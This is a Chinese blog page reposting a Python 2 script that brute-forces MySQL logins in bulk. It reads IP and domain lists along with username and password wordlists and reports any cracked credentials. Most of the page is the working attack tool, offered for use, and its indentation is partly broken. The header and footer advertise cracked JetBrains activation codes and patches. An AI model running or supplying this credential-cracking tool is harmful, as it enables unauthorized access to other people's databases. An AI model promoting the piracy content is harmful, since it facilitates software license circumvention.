专注于 JetBrains IDEA 全家桶,永久激活,教程
持续更新 PyCharm,IDEA,WebStorm,PhpStorm,DataGrip,RubyMine,CLion,AppCode 永久激活教程

Mysql批量暴破代码

升级自:www.waitalone.cn/python-mysq… 在原基础上增加如下功能:

1、 支持ip批量爆破,只需同目录存在ip.txt文件;
2、 如果输入的目标是域名,将域名添加到用户列表,增加爆破成功率;
3、 去掉了端口和数据库的输入,默认了端口3306和数据库mysql。

#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
import os, sys, re, socket, time  
from functools import partial  
from multiprocessing.dummy import Pool as ThreadPool  

    try:  
    import MySQLdb  
    except ImportError:  
    print '\n[!] MySQLdb模块导入错误,请到下面网址下载:'  
    print '[!] http://www.codegood.com/archives/129'  
    exit()  

    def usage():  
    print '+' + '-' * 50 + '+'  
    print '\t   Python MySQL批量爆破工具多线程版'  
    print '\t\t Time:2014-11-12'  
    print '+' + '-' * 50 + '+'  
    if len(sys.argv) != 4:  
        print "用法: " + os.path.basename(sys.argv[0]) + " 待破解的ip/domain或ip列表 用户名列表 密码列表"  
        print "实例: " + os.path.basename(sys.argv[0]) + " www.alin.cn或ip.txt user.txt pass.txt"  
        sys.exit()  

    def mysql_brute(user, password):  
    "mysql数据库破解函数"  
    db = None  
    try:  
        # print "user:", user, "password:", password  
        db = MySQLdb.connect(host=host, user=user, passwd=password, db="mysql", port=3306)  
        # print '[+] 破解成功:', user, password  
        result.append('ip:'+ host + '\t用户名:' + user + "\t密码:" + password)  
        print '[true] ip:'+ host + '\t用户名:' + user + "\t密码:" + password+'\n'  
    except KeyboardInterrupt:  
        print '大爷,按您的吩咐,已成功退出程序!'  
        exit()  
    except MySQLdb.Error, msg:  
        print '[false] ' + host+' '+user+':'+password+'\n'  
    finally:  
        if db:  
            db.close()  

    if __name__ == '__main__':  
    usage()  
    start_time = time.time()  
    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):  
        with open("tmp.txt","w") as f:  
            f.write(sys.argv[1])  
            ips = "tmp.txt"  
    elif re.match(r'\w+\.txt',sys.argv[1]):  
        ips = sys.argv[1]  
    else:  
        with open("tmp.txt","w") as f:  
            f.write(socket.gethostbyname(sys.argv[1]))  
            ips = "tmp.txt"  
        isExist = 0  
        isExist1 = 0  
        with open(sys.argv[2],'r') as tmp:  
            for line in tmp.readlines():  
                if sys.argv[1] in line:  
                    isExist = 1  
                    if isExist1 == 1:  
                        break  
                if re.sub(r'\.\w+$','',sys.argv[1]) in line:  
                    isExist1 = 1  
                    if isExist == 1:  
                        break  
        with open(sys.argv[2],"a") as f:  
            if isExist == 0:  
                f.write("\n"+sys.argv[1])  
            if isExist1 == 0:  
                f.write("\n"+re.sub(r'\.\w+$','',sys.argv[1]))  
    iplist = [k.rstrip() for k in open(ips)]              
    userlist = [i.rstrip() for i in open(sys.argv[2])]  
    passlist = [j.rstrip() for j in open(sys.argv[3])]  
    print '\n[+] 目  标:%s \n' % sys.argv[1]  
    print '[+] 用户名:%d 条\n' % len(userlist)  
    print '[+] 密  码:%d 条\n' % len(passlist)  
    print '[!] 密码破解中,请稍候……\n'  
    result = []  

    for host in iplist:  
        for user in userlist:  
            partial_user = partial(mysql_brute, user)  
            pool = ThreadPool(10)  
            pool.map(partial_user, passlist)  
            pool.close()  
            pool.join()  
    if len(result) != 0:  
        print '[+] 恭喜大爷,MySQL密码破解成功!\n'  
        for x in {}.fromkeys(result).keys():  
            print x + '\n'  
    else:  
        print '[-] 杯具了大爷,MySQL密码破解失败!\n'  
    print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)

文章永久链接:https://tech.souyunku.com/19426

未经允许不得转载:搜云库技术团队 » Mysql批量暴破代码

JetBrains 全家桶,激活、破解、教程

提供 JetBrains 全家桶激活码、注册码、破解补丁下载及详细激活教程,支持 IntelliJ IDEA、PyCharm、WebStorm 等工具的永久激活。无论是破解教程,还是最新激活码,均可免费获得,帮助开发者解决常见激活问题,确保轻松破解并快速使用 JetBrains 软件。获取免费的破解补丁和激活码,快速解决激活难题,全面覆盖 2024/2025 版本!

联系我们联系我们